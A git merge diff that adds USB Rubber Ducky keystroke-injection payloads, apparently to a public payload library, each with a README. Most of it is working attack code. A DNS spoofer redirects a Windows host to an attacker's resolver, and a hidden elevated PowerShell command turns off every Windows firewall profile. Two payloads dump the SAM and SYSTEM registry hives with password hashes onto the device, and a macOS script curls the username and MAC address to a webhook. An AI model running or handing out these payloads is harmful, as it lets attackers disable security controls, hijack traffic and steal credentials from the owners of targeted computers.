Merge a9e00c2c98 into 3333420b26

Deactivate/Disable Windows Firewall

payloads/library/execution/DNS_spoofer/README.md

@@ -0,0 +1,27 @@
+# Spoof DNS - Windows ✅
+
+DNS Spoofer
+
+## Description
+
+A payload used to alter the machine’s DNS settings, redirecting its DNS requests to an attacker-controlled server that can serve deceptive IP addresses for targeted domains.
+
+### Settings
+
+* Set the primary and secondary dns servers
+
+## Credits
+
+<h2 align="center"> Luu176 </h2>
+<div align=center>
+<table>
+  <tr>
+    <td align="center" width="96">
+      <a href="https://github.com/luu176">
+        <img src="https://avatars.githubusercontent.com/u/112649910?v=4?raw=true" width="48" height="48" />
+      </a>
+      <br>Github
+    </td>
+  </tr>
+</table>
+</div>

payloads/library/execution/DNS_spoofer/payload.txt

@@ -0,0 +1,69 @@
+REM Title: DNS changer
+REM Author: luu176
+REM Description: Changes DNS address of windows machine in powershell
+REM Target: Windows 10/11
+
+REM wifi interface should be named: Wi-Fi
+DEFINE #interface Ethernet
+DEFINE #primaryDNS 192.168.1.3
+DEFINE #secondaryDNS 1.1.1.1
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM_BLOCK DOCUMENTATION
+        Windows fully passive OS Detection and passive Detect Ready
+        Includes its own passive detect ready.
+        Does not require additional extensions.
+
+        USAGE:
+            Extension runs inline (here)
+            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+            boot delay
+            $_OS will be set to WINDOWS or NOT_WINDOWS
+            See end of payload for usage within payload
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #MAX_WAIT 150
+    DEFINE #CHECK_INTERVAL 20
+    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+    DEFINE #NOT_WINDOWS 7
+
+    $_OS = #NOT_WINDOWS
+
+    VAR $MAX_TRIES = #MAX_WAIT
+    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+        DELAY #CHECK_INTERVAL
+        $MAX_TRIES = ($MAX_TRIES - 1)
+    END_WHILE
+    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+        $_OS = WINDOWS
+    END_IF
+
+    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+        IF ($_OS == WINDOWS) THEN
+            STRING HELLO WINDOWS!
+        ELSE
+            STRING HELLO WORLD!
+        END_IF
+    END_REM
+END_EXTENSION
+
+SAVE_HOST_KEYBOARD_LOCK_STATE
+GUI r
+DELAY 150
+STRINGLN powershell Start-Process powershell -Verb runAs
+DELAY 800
+ALT y
+DELAY 500
+STRINGLN Set-DnsClientServerAddress -InterfaceAlias "#interface" -ServerAddresses ("#primaryDNS", "#secondaryDNS"); exit
+REM below is to blink the LED when payload done
+VAR $i = 0
+WHILE ( $i < 9 )
+    DELAY 150
+    CAPSLOCK
+    $i = ( $i + 1 )
+END_WHILE
+RESTORE_HOST_KEYBOARD_LOCK_STATE

payloads/library/execution/Disable_WiFi-MacOS/README.md

@@ -0,0 +1,24 @@
+# Disable WiFi 🛜
+
+This payload is designed to turn off the Wi-Fi on a MacOS system. To turn the Wi-Fi back on, simply modify the script to replace "off" with "on".
+
+### Details
+
+- **Title**: Disable WiFi
+- **Author**: bst04 - Aleff
+- **Version**: 1.0
+- **Category**: Execution
+- **Target**: MacOS
+
+### Dependencies
+
+- REM Change the #MODE value to "on" if you want to run the WiFi, else leave it as "off"
+   `DEFINE #MODE off`
+
+## How It Works 📜
+
+1. Sets a user-defined modality (`#MODE`) to `on` or `off`.
+2. Uses an extension (`EXTENSION DETECT_READY`) to detect when the device is ready with just a littebit more delay...
+3. After readiness is confirmed, the script:
+   - Runs commands to open **Terminal**.
+   - Run or stop the WiFi

payloads/library/execution/Disable_WiFi-MacOS/payload.txt

@@ -0,0 +1,53 @@
+REM_BLOCK
+##################################
+#                                #
+# Title        : Disable WiFi    #
+# Author       : bst04 - Aleff   #
+# Version      : 1.0             #
+# Category     : Execution       #
+# Target       : MacOS           #
+#                                #
+##################################
+END_REM
+
+REM Change the #MODE value to "on" if you want to run the WiFi, else leave it as "off"
+DEFINE #MODE off
+
+EXTENSION DETECT_READY
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM_BLOCK DOCUMENTATION
+        USAGE:
+            Extension runs inline (here)
+            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+            boot delay
+
+        TARGETS:
+            Any system that reflects CAPSLOCK will detect minimum required delay
+            Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #RESPONSE_DELAY 25
+    DEFINE #ITERATION_LIMIT 120
+
+    VAR $C = 0
+    WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+        CAPSLOCK
+        DELAY #RESPONSE_DELAY
+        $C = ($C + 1)
+    END_WHILE
+    CAPSLOCK
+END_EXTENSION
+
+REM Another pinch of delay in accordance with https://shop.hak5.org/blogs/usb-rubber-ducky/detect-ready
+DELAY 200
+
+GUI SPACE
+DELAY 250
+STRINGLN TERMINAL
+DELAY 250
+STRINGLN networksetup -setnetworkserviceenabled Wi-Fi #MODE
+DELAY 250
+GUI q

payloads/library/execution/Firewall_Deactivator/README.md

@@ -0,0 +1,23 @@
+# Firewall Deactivator - Windows ✅
+
+Deactivate firewall on windows
+
+## Description
+
+A payload used to deactivate all firewalls on windows in a discrete manner.
+
+## Credits
+
+<h2 align="center"> Luu176 </h2>
+<div align=center>
+<table>
+  <tr>
+    <td align="center" width="96">
+      <a href="https://github.com/luu176">
+        <img src="https://avatars.githubusercontent.com/u/112649910?v=4?raw=true" width="48" height="48" />
+      </a>
+      <br>Github
+    </td>
+  </tr>
+</table>
+</div>

payloads/library/execution/Firewall_Deactivator/payload.txt

@@ -0,0 +1,61 @@
+REM Title:        Firewall deactivator
+REM Author:       luu176
+REM Description:  Deactivate all firewalls in windows machine using hidden powershell
+REM Target:       Windows
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM_BLOCK DOCUMENTATION
+        Windows fully passive OS Detection and passive Detect Ready
+        Includes its own passive detect ready.
+        Does not require additional extensions.
+
+        USAGE:
+            Extension runs inline (here)
+            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+            boot delay
+            $_OS will be set to WINDOWS or NOT_WINDOWS
+            See end of payload for usage within payload
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #MAX_WAIT 150
+    DEFINE #CHECK_INTERVAL 20
+    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+    DEFINE #NOT_WINDOWS 7
+
+    $_OS = #NOT_WINDOWS
+
+    VAR $MAX_TRIES = #MAX_WAIT
+    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+        DELAY #CHECK_INTERVAL
+        $MAX_TRIES = ($MAX_TRIES - 1)
+    END_WHILE
+    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+        $_OS = WINDOWS
+    END_IF
+
+    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+        IF ($_OS == WINDOWS) THEN
+            STRING HELLO WINDOWS!
+        ELSE
+            STRING HELLO WORLD!
+        END_IF
+    END_REM
+END_EXTENSION
+
+GUI r
+DELAY 200
+STRINGLN powershell -Command "Start-Process powershell -ArgumentList '-Command Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False' -Verb RunAs -WindowStyle Hidden"
+DELAY 800
+ALT y
+SAVE_HOST_KEYBOARD_LOCK_STATE
+VAR $i = 0
+WHILE ( $i < 9 )
+    DELAY 150
+    CAPSLOCK
+    $i = ( $i + 1 )
+END_WHILE
+RESTORE_HOST_KEYBOARD_LOCK_STATE

payloads/library/exfiltration/Exfiltrate-Mac-Address-MacOS/README.md

@@ -0,0 +1,25 @@
+# Exfiltrate Mac Address - MacOS
+
+This payload is designed to retrieve the MAC address and username from a macOS system and send this information to a specified webhook.
+
+### Details
+
+- **Title**: Exfiltrate Mac Address
+- **Author**: bst04 - Aleff
+- **Version**: 1.0
+- **Category**: Exfiltration
+- **Target**: MacOS
+
+### Dependencies
+
+- Set the #WEBHOOK to complete the exfiltration
+   `DEFINE #WEBHOOK example`
+
+## How It Works 📜
+
+1. Sets a user-defined webhook (`#WEBHOOK`) to complete the exfiltration
+2. Uses an extension (`EXTENSION DETECT_READY`) to detect when the device is ready with just a littebit more delay...
+3. After readiness is confirmed, the script:
+   - Runs commands to open **Terminal**.
+   - Acquire the mac address and the system user name
+   - Send this informations through the Webhook

payloads/library/exfiltration/Exfiltrate-Mac-Address-MacOS/payload.txt

@@ -0,0 +1,55 @@
+REM_BLOCK
+####################################################
+#                                                  #
+# Title        : Exfiltrate Mac Address - MacOS    #
+# Author       : bst04 - Aleff                     #
+# Version      : 1.0                               #
+# Category     : Exfiltration                      #
+# Target       : MacOS                             #
+#                                                  #
+####################################################
+END_REM
+
+REM Set the #WEBHOOK to complete the exfiltration
+DEFINE #WEBHOOK example
+
+EXTENSION DETECT_READY
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM_BLOCK DOCUMENTATION
+        USAGE:
+            Extension runs inline (here)
+            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+            boot delay
+
+        TARGETS:
+            Any system that reflects CAPSLOCK will detect minimum required delay
+            Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #RESPONSE_DELAY 25
+    DEFINE #ITERATION_LIMIT 120
+
+    VAR $C = 0
+    WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+        CAPSLOCK
+        DELAY #RESPONSE_DELAY
+        $C = ($C + 1)
+    END_WHILE
+    CAPSLOCK
+END_EXTENSION
+
+REM Another pinch of delay in accordance with https://shop.hak5.org/blogs/usb-rubber-ducky/detect-ready
+DELAY 200
+
+GUI SPACE
+DELAY 250
+STRINGLN TERMINAL
+DELAY 750
+STRINGLN mac=$(networksetup -getmacaddress en0) 
+DELAY 750
+STRINGLN name=$(id -un)
+DELAY 850
+STRINGLN curl -X POST -H "Content-Type: application/x-www-form-urlencoded" --data-urlencode "content=User:$name | $mac" #WEBHOOK

payloads/library/exfiltration/IP-Out/README.md

@@ -0,0 +1,12 @@
+# IP-OUT
+This is a USB Rubber Ducky payload that opens a powershell window in the target (Windows based) computer, then extracts the `ipconfig` information in the form of a text file saved on the USB.
+
+
+
+
+
+## Useful Tips
+
+**Change #DRIVELABEL to your own personal drive label if it isn't already**
+
+Remember: Do not use this for unethical hacking practices! This is for educational purposed only!

payloads/library/exfiltration/IP-Out/payload.txt

@@ -0,0 +1,63 @@
+REM Title: IP-Out
+REM Author: Mavisinator30001
+REM Description: Opens a powershell window and prints the current IP of the device to a text file in the BadUSB
+REM Target: Any Windows System
+REM DISCLAIMER!!! Neither I, nor Hak5, condone any unethical hacking practices using this payload... FOR EDUCATIONAL PURPOSES ONLY
+DEFINE #DRIVELABEL DUCKY
+EXTENSION PASSIVE_WINDOWS_DETECT
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM_BLOCK DOCUMENTATION
+        Windows fully passive OS Detection and passive Detect Ready
+        Includes its own passive detect ready.
+        Does not require additional extensions.
+
+        USAGE:
+            Extension runs inline (here)
+            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+            boot delay
+            $_OS will be set to WINDOWS or NOT_WINDOWS
+            See end of payload for usage within payload
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #MAX_WAIT 150
+    DEFINE #CHECK_INTERVAL 20
+    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+    DEFINE #NOT_WINDOWS 7
+
+    $_OS = #NOT_WINDOWS
+
+    VAR $MAX_TRIES = #MAX_WAIT
+    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+        DELAY #CHECK_INTERVAL
+        $MAX_TRIES = ($MAX_TRIES - 1)
+    END_WHILE
+    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+        $_OS = WINDOWS
+    END_IF
+
+    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+        IF ($_OS == WINDOWS) THEN
+            STRING HELLO WINDOWS!
+        ELSE
+            STRING HELLO WORLD!
+        END_IF
+    END_REM
+END_EXTENSION
+IF $_OS != WINDOWS
+    STOP_PAYLOAD
+END_IF
+ATTACKMODE HID STORAGE
+DELAY 500
+GUI r
+DELAY 300
+STRINGLN Powershell
+DELAY 1000
+STRINGLN $driveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_Volume WHERE Label='#DRIVELABEL'").DriveLetter; if ($driveLetter) { ipconfig | Out-File -Filepath "$driveLetter\exfil.txt" -Encoding utf8 }
+WAIT_FOR_STORAGE_ACTIVITY
+WAIT_FOR_STORAGE_INACTIVITY
+ALT F4
+ATTACKMODE OFF
+HIDE_PAYLOAD

payloads/library/exfiltration/NTLM_ducky/README.md

@@ -0,0 +1,29 @@
+# Exfiltrate NTLM Hash - Windows ✅
+
+A Rubber Ducky payload to exfiltrate NTLM hash files from a Windows machine onto the SD card.
+
+## Description
+
+This payload script captures and <strong>exfiltrates NTLM hash files</strong> from a Windows machine. It uses PowerShell commands to locate and save the SAM and SYSTEM files, which contain hashed user passwords, <strong><u>onto the Rubber Ducky's SD card</u></strong> for later extraction and analysis. Upon successful file extraction, <strong> the payload triggers a visual confirmation by <u>blinking the Caps Lock LED</u> </strong>
+
+
+### Settings
+
+- **Drive Label:** Set the target drive label for Rubber Ducky storage (default: `DUCKY`).
+- **Blink Count:** Adjust the number of Caps Lock LED blinks by setting the `#numBlinks` variable (default is 9 blinks).
+
+## Credits
+
+<h2 align="center"> Luu176 </h2>
+<div align="center">
+  <table>
+    <tr>
+      <td align="center" width="96">
+        <a href="https://github.com/luu176">
+          <img src="https://avatars.githubusercontent.com/u/112649910?v=4" width="48" height="48" />
+        </a>
+        <br>GitHub
+      </td>
+    </tr>
+  </table>
+</div>

payloads/library/exfiltration/NTLM_ducky/payload.txt

@@ -0,0 +1,81 @@
+REM_BLOCK
+TITLE           Exfiltrate NTLM Hash Files onto Ducky Storage
+AUTHOR          Luu176
+DESCRIPTION     This payload exfiltrates NTLM hash files (which contain hashed passwords for users 
+                on the current Windows device) to the Rubber Ducky's SD card for further analysis. 
+                It utilizes PowerShell commands to locate and save NTLM files (SAM and SYSTEM) to 
+                the defined storage drive on the Ducky device.
+END_REM
+
+DEFINE #driveLabel DUCKY
+REM below you can set the number of blinks for the caps lock when finished (default 9)
+DEFINE #numBlinks 9
+
+ATTACKMODE HID STORAGE
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM_BLOCK DOCUMENTATION
+        Windows fully passive OS Detection and passive Detect Ready
+        Includes its own passive detect ready.
+        Does not require additional extensions.
+
+        USAGE:
+            Extension runs inline (here)
+            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+            boot delay
+            $_OS will be set to WINDOWS or NOT_WINDOWS
+            See end of payload for usage within payload
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #MAX_WAIT 150
+    DEFINE #CHECK_INTERVAL 20
+    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+    DEFINE #NOT_WINDOWS 7
+
+    $_OS = #NOT_WINDOWS
+
+    VAR $MAX_TRIES = #MAX_WAIT
+    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+        DELAY #CHECK_INTERVAL
+        $MAX_TRIES = ($MAX_TRIES - 1)
+    END_WHILE
+    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+        $_OS = WINDOWS
+    END_IF
+
+    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+        IF ($_OS == WINDOWS) THEN
+            STRING HELLO WINDOWS!
+        ELSE
+            STRING HELLO WORLD!
+        END_IF
+    END_REM
+END_EXTENSION
+
+SAVE_HOST_KEYBOARD_LOCK_STATE
+IF ($_CAPSLOCK_ON == TRUE)
+    CAPSLOCK
+END_IF
+GUI d
+DELAY 1000
+GUI r
+DELAY 500
+STRINGLN powershell Start-Process powershell -Verb runAs
+DELAY 800
+ALT y
+DELAY 800
+STRINGLN cd (gwmi win32_volume -f 'label=''#driveLabel''').Name;reg save hklm\sam SAM;reg save hklm\system SYS;(New-Object -ComObject wscript.shell).SendKeys('{CAPSLOCK}');exit
+GUI d
+WAIT_FOR_CAPS_ON 
+REM once finished downloading SAM and SYSTEM, caps lock LED turn on and then flash (note: may take a couple minutes max to download)
+VAR $i = 0
+WHILE ( $i < #numBlinks )
+    DELAY 150
+    CAPSLOCK
+    $i = ( $i + 1 )
+END_WHILE
+RESTORE_HOST_KEYBOARD_LOCK_STATE

payloads/library/exfiltration/System-Stealer/payload.txt

@@ -0,0 +1,74 @@
+REM TITLE System Stealer
+REM AUTHOR mavisinator30001
+REM DESCRIPTION Creates a file in the Duck called sam.save and system.save with encrypted system information in both
+REM DISCLAIMER Neither I, nor Hak5, condone any unethical hacking practices, whether taken from this payload or otherwise!
+REM DISCLAIMER This is for educational purposes ONLY
+DELAY 1000
+ATTACKMODE HID STORAGE
+EXTENSION PASSIVE_WINDOWS_DETECT
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM_BLOCK DOCUMENTATION
+        Windows fully passive OS Detection and passive Detect Ready
+        Includes its own passive detect ready.
+        Does not require additional extensions.
+
+        USAGE:
+            Extension runs inline (here)
+            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+            boot delay
+            $_OS will be set to WINDOWS or NOT_WINDOWS
+            See end of payload for usage within payload
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #MAX_WAIT 150
+    DEFINE #CHECK_INTERVAL 20
+    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+    DEFINE #NOT_WINDOWS 7
+
+    $_OS = #NOT_WINDOWS
+
+    VAR $MAX_TRIES = #MAX_WAIT
+    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+        DELAY #CHECK_INTERVAL
+        $MAX_TRIES = ($MAX_TRIES - 1)
+    END_WHILE
+    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+        $_OS = WINDOWS
+    END_IF
+
+    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+        IF ($_OS == WINDOWS) THEN
+            STRING HELLO WINDOWS!
+        ELSE
+            STRING HELLO WORLD!
+        END_IF
+    END_REM
+END_EXTENSION
+REM Change $DRIVELABEL to the storage label of your duck
+DEFINE #DRIVELABEL DUCKY
+IF ($_OS == WINDOWS) THEN
+    GUI r
+    DELAY 500
+    STRING powershell
+    DELAY 1000
+    CTRL-SHIFT-ENTER
+    DELAY 750
+    LEFT
+    ENTER
+    DELAY 1000
+    STRINGLN $DriveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_LogicalDisk WHERE VolumeName='#DRIVELABEL'").DeviceID; Set-Variable -Name 'DriveLetter' -Value $DriveLetter -Scope Global; Write-Output $DriveLetter
+    DELAY 250
+    STRINGLN reg save HKLM\sam $DriveLetter/sam.save
+    WAIT_FOR_STORAGE_ACTIVITY
+    WAIT_FOR_STORAGE_INACTIVITY
+    STRINGLN reg save HKLM\system $DriveLetter/system.save
+    WAIT_FOR_STORAGE_ACTIVITY
+    WAIT_FOR_STORAGE_INACTIVITY
+    ALT F4
+ELSE
+    ATTACKMODE OFF
+    STOP_PAYLOAD
+END_IF

payloads/library/general/1_Script_to_Rule_Them_All/ReadMe.md

@@ -0,0 +1,5 @@
+## 1 Script to Rule Them All
+
+The purpose of this frankenstein mess is to use OS detection to run conditional code after, specific to the OS.
+
+It differs from just combining the two extensions in very few ways, but there are slight improvement tweaks from my own testing (hence the new name to avoid conflicts) and more documentation on the process within.

payloads/library/general/1_Script_to_Rule_Them_All/payload.txt

@@ -0,0 +1,293 @@
+REM Title: One Script To Rule Them All
+REM Author: Korben and UberGuidoZ
+REM Description: Attempt to detect OS then run conditional code based on result.
+REM Target: Windows, macOS, Linux, iOS, ChromeOS, Android, plus custom OS.
+REM Version: 1.6
+REM Category: All of them
+REM Source: https://github.com/UberGuidoZ/Hak5-USBRubberducky-Payloads
+
+EXTENSION OS_DETECTION_UBER
+    REM VERSION 2.0
+    REM AUTHOR: Korben and UberGuidoZ
+
+    REM_BLOCK DOCUMENTATION
+        USB Rubber Ducky Host OS Detection (moving target, may fall)
+        Results may vary greatly depending on a combination of many variables:
+         - number of testing stages
+         - specific devices and versions tested against
+         - number of systems testing for (scope)
+         - detection techniques (passive/invisible/active/hybrid)
+         - overall speed
+         - overall accuracy
+
+        If all you require is Windows vs <any other os> detection, the PASSIVE_WINDOWS_DETECT extension is recommended over this one.
+
+        TARGET:
+            DEFAULT - Windows, Mac, Linux
+            ADVANCED_DETECTION - Windows, Mac, Linux, iOS, ChromeOS, Android, custom defined OS
+
+        USAGE:
+            Call DETECT_OS_UBER() anywhere in your payload after the extension.
+            Place this extension and the DETECT_OS_UBER() before you would like to first reference $_OS to execute payload code conditionally.
+
+        FEEDBACK:
+            As mentioned above, this a moving target (especially for macOS).
+            Please report any issues identifying specific operating systems with as much detail as possible.
+            Your feedback will greatly help solidify the robustness of this extension and others based on it.
+
+        DEBUGGING:
+            SET DEBUGGING_OUTPUT DEFINE to TRUE, deploy on a target with text editor open for debug output
+    END_REM
+
+    REM CONFIGURATION
+
+REM For Debugging (use if troubleshooting or reporting issues):
+    DEFINE #DEBUGGING_OUTPUT FALSE
+    DEFINE #ADVANCED_DETECTION FALSE
+
+REM Timing fine tuning:
+    DEFINE #STARTUP_DELAY 1500
+    DEFINE #RESTART_WAIT 1000
+    DEFINE #EXECUTE_DELAY 2000
+    DEFINE #CONNECT_WAIT 1000
+    DEFINE #OS_DETECT_MODE HID
+REM Define Apple keyboard to keep macOS happy
+    DEFINE #OS_DETECT_VID VID_05AC
+    DEFINE #OS_DETECT_PID PID_021E
+    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+    DEFINE #HOST_RESPONSE_TIMEOUT 1000
+
+REM Start DETECT_OS function
+    FUNCTION DETECT_OS_UBER()
+        $_HOST_CONFIGURATION_REQUEST_COUNT = 0
+        ATTACKMODE #OS_DETECT_MODE #OS_DETECT_VID #OS_DETECT_PID
+        DELAY #STARTUP_DELAY
+        SAVE_HOST_KEYBOARD_LOCK_STATE
+
+REM Debugging if TRUE
+        IF_DEFINED_TRUE #DEBUGGING_OUTPUT
+            IF_DEFINED_TRUE #ADVANCED_DETECTION
+                STRING ADVANCED OS DETECT
+            ELSE_DEFINED
+                STRING OS DETECT
+            END_IF_DEFINED
+            ENTER
+            STRING test caps
+        END_IF_DEFINED
+
+        IF ($_CAPSLOCK_ON == FALSE) THEN
+            LED_R
+            CAPSLOCK
+            DELAY #HOST_RESPONSE_TIMEOUT
+        END_IF
+        LED_OFF
+
+        IF_DEFINED_TRUE #DEBUGGING_OUTPUT
+            ENTER
+            STRING test done
+        END_IF_DEFINED
+
+        IF $_RECEIVED_HOST_LOCK_LED_REPLY THEN
+            IF_DEFINED_TRUE #DEBUGGING_OUTPUT
+                ENTER
+                STRING received led response
+            END_IF_DEFINED
+            LED_G
+            IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+                IF_DEFINED_TRUE #DEBUGGING_OUTPUT
+                    ENTER
+                    STRING Prediction: Windows
+                END_IF_DEFINED
+                $_OS = WINDOWS
+            ELSE
+                IF_DEFINED_TRUE #DEBUGGING_OUTPUT
+                    ENTER
+                    STRING Prediction: Linux
+                END_IF_DEFINED
+                $_OS = LINUX
+            END_IF
+        ELSE
+            IF_DEFINED_TRUE #DEBUGGING_OUTPUT
+                ENTER
+                STRING No LED response
+                ENTER
+                STRING Prediciton: MacOS
+            END_IF_DEFINED
+            $_OS = MACOS
+        END_IF
+
+        IF_DEFINED_TRUE #ADVANCED_DETECTION
+            IF ( $_OS == LINUX ) THEN
+                IF_DEFINED_TRUE #DEBUGGING_OUTPUT
+                    ENTER
+                    STRING Soft reconnect
+                END_IF_DEFINED
+                ATTACKMODE OFF
+                DELAY #RESTART_WAIT
+                ATTACKMODE #OS_DETECT_MODE #OS_DETECT_VID #OS_DETECT_PID
+                DELAY #CONNECT_WAIT
+                IF_DEFINED_TRUE #DEBUGGING_OUTPUT
+                    ENTER
+                    STRING Reconnected
+                END_IF_DEFINED
+                IF ($_CAPSLOCK_ON == TRUE) THEN
+                    IF_DEFINED_TRUE #DEBUGGING_OUTPUT
+                        ENTER
+                        STRING Caps LED on
+                        ENTER
+                        STRING Test numlock
+                    END_IF_DEFINED
+                    NUMLOCK
+                    DELAY #HOST_RESPONSE_TIMEOUT
+                    IF_DEFINED_TRUE #DEBUGGING_OUTPUT
+                        ENTER
+                        STRING Test done
+                    END_IF_DEFINED
+                    IF ($_NUMLOCK_ON == FALSE) THEN
+                        IF_DEFINED_TRUE #DEBUGGING_OUTPUT
+                            ENTER
+                            STRING No numlock LED
+                            ENTER
+                            STRING Prediciton: ChromeOS
+                        END_IF_DEFINED
+                        $_OS = CHROMEOS
+                    ELSE
+                        IF_DEFINED_TRUE #DEBUGGING_OUTPUT
+                            ENTER
+                            STRING Numlock LED on
+                            ENTER
+                            STRING Testing scrolllock
+                        END_IF_DEFINED
+                        SCROLLLOCK
+                        DELAY #HOST_RESPONSE_TIMEOUT
+                        IF_DEFINED_TRUE #DEBUGGING_OUTPUT
+                            ENTER
+                            STRING Test done
+                        END_IF_DEFINED
+                        IF ($_SCROLLLOCK_ON == TRUE) THEN
+                            IF_DEFINED_TRUE #DEBUGGING_OUTPUT
+                                ENTER
+                                STRING Scrolllock LED on
+                                ENTER
+                                STRING Prediciton: Android
+                            END_IF_DEFINED
+                            $_OS = ANDROID
+                        ELSE
+                            IF_DEFINED_TRUE #DEBUGGING_OUTPUT
+                                ENTER
+                                STRING No scrolllock reply
+                                ENTER
+                                STRING Prediction: Linux
+                            END_IF_DEFINED
+                            $_OS = LINUX
+                        END_IF
+                    END_IF
+                END_IF
+            ELSE IF ($_OS == MACOS) THEN
+                IF ($_CAPSLOCK_ON == TRUE) THEN
+                    IF_DEFINED_TRUE #DEBUGGING_OUTPUT
+                        ENTER
+                        STRING Caps LED on
+                        ENTER
+                        STRING Prediction: iOS
+                    END_IF_DEFINED
+                    $_OS = IOS
+                ELSE 
+                    IF_DEFINED_TRUE #DEBUGGING_OUTPUT
+                        ENTER
+                        STRING No caps reply
+                        ENTER
+                        STRING Prediction: MacOS
+                    END_IF_DEFINED
+                    $_OS = MACOS
+                END_IF
+            ELSE IF ($_OS == WINDOWS) THEN
+                IF_DEFINED_TRUE #DEBUGGING_OUTPUT
+                    ENTER
+                    STRING Confident Windows Prediction
+                END_IF_DEFINED
+                $_OS = WINDOWS
+            END_IF
+        END_IF_DEFINED
+
+        RESTORE_HOST_KEYBOARD_LOCK_STATE
+
+        IF_DEFINED_TRUE #DEBUGGING_OUTPUT
+            ENTER
+            STRING OS_DETECT complete
+            ENTER
+        END_IF_DEFINED
+    END_FUNCTION
+END_EXTENSION
+
+EXTENSION HELLO_OS_UBER
+    REM VERSION 2.0
+    REM AUTHOR: Korben and UberGuidoZ
+
+    REM_BLOCK DOCUMENTATION
+        USAGE:
+            For use with OS_DETECTION_UBERExtension, call HELLO_OS_UBER()
+            after DETECT_OS_UBER() prints the OS determination. Make sure
+            your custom conditional code is inserted below where commented.
+    END_REM
+
+    REM Defining custom $_OS enums if desired
+    DEFINE #EXTRA_EXAMPLES FALSE
+    DEFINE #SOME_OTHER_OS 6
+    DEFINE #ANOTHER_OS 7
+
+    FUNCTION HELLO_OS_UBER() 
+        IF ($_OS == WINDOWS) THEN
+            REM Windows code starts here
+            DELAY 1000
+            GUI r
+            DELAY 500
+            STRINGLN notepad
+            DELAY 1000
+            STRINGLN Legit DS3 on Windows
+            REM Windows code ends here
+        ELSE IF ($_OS == MACOS) THEN
+            REM macOS code starts here
+            DELAY 2000
+            GUI SPACE
+            DELAY 500
+            STRINGLN TextEdit
+            STRINGLN Legit DS3 on macOS
+            REM macOS code ends here
+        ELSE IF ($_OS == LINUX) THEN
+            REM Linux code starts here
+            DELAY 2000
+            CTRL ALT t
+            DELAY 100
+            STRINGLN nano
+            STRINGLN Legit DS3 on Linux
+            REM Linux code ends here
+        ELSE IF ($_OS == IOS) THEN
+            REM iOS code starts here
+            REM iOS code ends here
+        ELSE IF ($_OS == CHROMEOS) THEN
+            REM ChromeOS code starts here
+            REM ChromeOS code ends here
+        ELSE IF ($_OS == ANDROID) THEN
+            REM Android code starts here
+            REM Android code ends here
+        IF_DEFINED_TRUE #EXTRA_EXAMPLES
+            ELSE IF($_OS == #SOME_OTHER_OS) THEN
+                REM Custom Other OS code starts here
+                REM Custom Other OS code ends here
+            ELSE IF($_OS == #ANOTHER_OS) THEN
+                REM Another custom Other OS code starts here
+                REM Another custom Other OS code ends here
+        END_IF_DEFINED
+            ELSE
+                REM All else fails code starts here
+                REM All else fails code ends here
+        END_IF
+    END_FUNCTION
+END_EXTENSION
+
+REM Do the do! Change delay at beginning if desired.
+
+DETECT_OS_UBER()
+DELAY #EXECUTE_DELAY
+HELLO_OS_UBER()

payloads/library/prank/Hacker_Typer/payload.txt

